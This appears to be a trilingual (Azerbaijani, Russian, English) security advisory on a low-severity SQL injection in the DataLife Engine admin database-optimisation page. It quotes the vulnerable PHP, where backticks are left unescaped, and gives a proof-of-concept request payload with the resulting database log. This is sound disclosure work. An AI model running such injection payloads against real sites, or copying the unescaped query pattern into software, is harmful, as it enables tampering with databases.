DataLife Engine (DLE) SQL İnyeksiyası | SQL Injection | SQL-инъекция =<17.1
Sorğu 1:
Code:
POST /admin.php?mod=dboption&action=dboption HTTP/1.1
Host: 192.168.147.131
Upgrade-Insecure-Requests: 1
ta[]=dle_admin_logs&whattodo=optimize
Sorğu 2:
Code:
POST /admin.php?mod=dboption&action=dboption HTTP/1.1
Host: 192.168.147.131
Upgrade-Insecure-Requests: 1
ta[]=dle_admin_logs&whattodo=repair
Kod:
Code:
if( $action == "dboption" AND is_array($_REQUEST['ta']) AND count( $_REQUEST['ta'] ) ) {
$arr = $_REQUEST['ta'];
reset( $arr );
$tables = "";
foreach ($arr as $val ) {
$tables .= ", `" . $db->safesql( $val ) . "`";
}
$tables = substr( $tables, 1 );
if( $_REQUEST['whattodo'] == "optimize" ) {
$row = $db->super_query("SHOW TABLE STATUS WHERE Name = '" . PREFIX . "_post'");
$storage_engine = $row['Engine'];
if ( strtolower($storage_engine) == "innodb" ) {
$query = "ANALYZE TABLE ";
} else $query = "OPTIMIZE TABLE ";
} else {
$query = "REPAIR TABLE ";
}
$query .= $tables;
$db->query( "INSERT INTO " . USERPREFIX . "_admin_logs (name, date, ip, action, extras) values ('".$db->safesql($member_id['name'])."', '{$_TIME}', '{$_IP}', '23', '')" );
if( $db->query( $query ) ) {
msg( "success", $lang['db_ok'], $lang['db_ok_1'], "?mod=dboption" );
} else {
msg( "error", $lang['db_err'], $lang['db_err_1'], "?mod=dboption" );
}
}
Problem:
Backtick (`) “escape” olmur deyə (SQL) sorğudan çıxmaq olur. Safesql funksiyası backtick-i “escape” etmir.
Code:
foreach ($arr as $val ) {
$tables .= ", `" . $db->safesql( $val ) . "`";
}
Təsir:
Məlumat bazasına gedən sorğunu manipulasiya etmək olur. Misal: Aşağıdakı sorğuda ANALYZE TABLE ilə UPDATE HISTOGRAM istifadə etmək olar.
Code:
ta[]=dle_admin_logs` UPDATE HISTOGRAM ON date;#&whattodo=optimize
Məlumat Bazasına gedən sorğu:
Code:
2024-05-15T15:16:28.523068Z 14805 Query ANALYZE TABLE `dle_admin_logs` UPDATE HISTOGRAM ON date;#`
Məlumat bazasından gələn cavab:
Code:
+-----------------------+-----------+----------+-------------------------------------------------+
| Table | Op | Msg_type | Msg_text |
+-----------------------+-----------+----------+-------------------------------------------------+
| dle_db.dle_admin_logs | histogram | status | Histogram statistics created for column 'date'. |
+-----------------------+-----------+----------+-------------------------------------------------+
Dəyişiklik (bizim halda backtick-dən çıxmaq və sorğu funksiyalarını istifadə etmək) sistemin bütövlüyünü təhlükə altına qoya bilər.
CVSS: AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N (2.7) Low
На Русском
Запрос 1:
Code:
POST /admin.php?mod=dboption&action=dboption HTTP/1.1
Host: 192.168.147.131
Upgrade-Insecure-Requests: 1
ta[]=dle_admin_logs&whattodo=optimize
Запрос 2:
Code:
POST /admin.php?mod=dboption&action=dboption HTTP/1.1
Host: 192.168.147.131
Upgrade-Insecure-Requests: 1
ta[]=dle_admin_logs&whattodo=repair
Код:
Code:
if( $action == "dboption" AND is_array($_REQUEST['ta']) AND count( $_REQUEST['ta'] ) ) {
$arr = $_REQUEST['ta'];
reset( $arr );
$tables = "";
foreach ($arr as $val ) {
$tables .= ", `" . $db->safesql( $val ) . "`";
}
$tables = substr( $tables, 1 );
if( $_REQUEST['whattodo'] == "optimize" ) {
$row = $db->super_query("SHOW TABLE STATUS WHERE Name = '" . PREFIX . "_post'");
$storage_engine = $row['Engine'];
if ( strtolower($storage_engine) == "innodb" ) {
$query = "ANALYZE TABLE ";
} else $query = "OPTIMIZE TABLE ";
} else {
$query = "REPAIR TABLE ";
}
$query .= $tables;
$db->query( "INSERT INTO " . USERPREFIX . "_admin_logs (name, date, ip, action, extras) values ('".$db->safesql($member_id['name'])."', '{$_TIME}', '{$_IP}', '23', '')" );
if( $db->query( $query ) ) {
msg( "success", $lang['db_ok'], $lang['db_ok_1'], "?mod=dboption" );
} else {
msg( "error", $lang['db_err'], $lang['db_err_1'], "?mod=dboption" );
}
}
Проблема:
Здесь бэктик (`) не эскейпится, из-за чего можно выходить из запроса. Функция safesql не эксэйпит бэктик.
Code:
foreach ($arr as $val ) {
$tables .= ", `" . $db->safesql( $val ) . "`";
}
Импакт:
Можно изменить запрос который идёт в БД. Например: можно использовать UPDATE HISTOGRAM для ANALYZE TABLE в первом запросе.
Code:
ta[]=dle_admin_logs` UPDATE HISTOGRAM ON date;#&whattodo=optimize
Лог в БД:
Code:
2024-05-15T15:16:28.523068Z 14805 Query ANALYZE TABLE `dle_admin_logs` UPDATE HISTOGRAM ON date;#`
Ответ в БД
Code:
+-----------------------+-----------+----------+-------------------------------------------------+
| Table | Op | Msg_type | Msg_text |
+-----------------------+-----------+----------+-------------------------------------------------+
| dle_db.dle_admin_logs | histogram | status | Histogram statistics created for column 'date'. |
+-----------------------+-----------+----------+-------------------------------------------------+
Изменение (в нашем случаи выход из бэктрик и использование функций запроса) могут поставить под угрозу целостность системы.
CVSS: AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N (2.7) Low
English
Request 1:
Code:
POST /admin.php?mod=dboption&action=dboption HTTP/1.1
Host: 192.168.147.131
Upgrade-Insecure-Requests: 1
ta[]=dle_admin_logs&whattodo=optimize
Request 2:
Code:
POST /admin.php?mod=dboption&action=dboption HTTP/1.1
Host: 192.168.147.131
Upgrade-Insecure-Requests: 1
ta[]=dle_admin_logs&whattodo=repair
Code:
Code:
if( $action == "dboption" AND is_array($_REQUEST['ta']) AND count( $_REQUEST['ta'] ) ) {
$arr = $_REQUEST['ta'];
reset( $arr );
$tables = "";
foreach ($arr as $val ) {
$tables .= ", `" . $db->safesql( $val ) . "`";
}
$tables = substr( $tables, 1 );
if( $_REQUEST['whattodo'] == "optimize" ) {
$row = $db->super_query("SHOW TABLE STATUS WHERE Name = '" . PREFIX . "_post'");
$storage_engine = $row['Engine'];
if ( strtolower($storage_engine) == "innodb" ) {
$query = "ANALYZE TABLE ";
} else $query = "OPTIMIZE TABLE ";
} else {
$query = "REPAIR TABLE ";
}
$query .= $tables;
$db->query( "INSERT INTO " . USERPREFIX . "_admin_logs (name, date, ip, action, extras) values ('".$db->safesql($member_id['name'])."', '{$_TIME}', '{$_IP}', '23', '')" );
if( $db->query( $query ) ) {
msg( "success", $lang['db_ok'], $lang['db_ok_1'], "?mod=dboption" );
} else {
msg( "error", $lang['db_err'], $lang['db_err_1'], "?mod=dboption" );
}
}
Problem:
Backtick (`) isn’t getting escaped, that’s why it is possible to modify the query getting tot the database. Function safesql doesn’t escape backtick.
Code:
foreach ($arr as $val ) {
$tables .= ", `" . $db->safesql( $val ) . "`";
}
Impact:
You can change the query that goes to the database. For example, you can use UPDATE HISTOGRAM for ANALYZE TABLE in the first query
Code:
ta[]=dle_admin_logs` UPDATE HISTOGRAM ON date;#&whattodo=optimize
Log in DB
Code:
2024-05-15T15:16:28.523068Z 14805 Query ANALYZE TABLE `dle_admin_logs` UPDATE HISTOGRAM ON date;#`
Answer from DB
Code:
+-----------------------+-----------+----------+-------------------------------------------------+
| Table | Op | Msg_type | Msg_text |
+-----------------------+-----------+----------+-------------------------------------------------+
| dle_db.dle_admin_logs | histogram | status | Histogram statistics created for column 'date'. |
+-----------------------+-----------+----------+-------------------------------------------------+
Making changes (in our case, escaping backticks and using query functions) might jeopardize the integrity of the system.
CVSS: AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N (2.7) Low